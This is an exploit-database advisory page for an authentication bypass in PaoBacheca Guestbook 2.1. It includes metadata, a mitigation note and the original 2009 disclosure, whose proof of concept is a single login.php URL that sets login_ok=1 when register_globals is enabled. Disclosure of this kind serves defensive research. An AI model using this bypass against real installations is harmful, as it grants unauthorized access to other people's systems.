header-logo
Suggest Exploit
vendor:
Guestbook
by:
SirGod
5.5
CVSS
MEDIUM
Authentication Bypass
287
CWE
Product Name: Guestbook
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

PaoBacheca Guestbook 2.1 (login_ok) Authentication Bypass Vulnerability

This exploit allows an attacker to bypass the authentication mechanism in the PaoBacheca Guestbook 2.1 software. By setting the 'login_ok' parameter to 1 in the login.php URL, the attacker can gain unauthorized access to the system.

Mitigation:

The vendor should update the software to fix this vulnerability. Users are advised to apply the latest patch or upgrade to a newer version of the software.
Source

Exploit-DB raw data:

#############################################################################
[+] PaoBacheca Guestbook 2.1 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#############################################################################

download : http://zenas.org/paobacheca/download/scarica.html

[+] Authentication Bypass Vulnerability


 - Notes : register_globals = on


 - PoC :

     http://127.0.0.1/[path]/login.php?login_ok=1

#############################################################################

# milw0rm.com [2009-07-28]

Navigation

Suggest Exploit

Services By CQR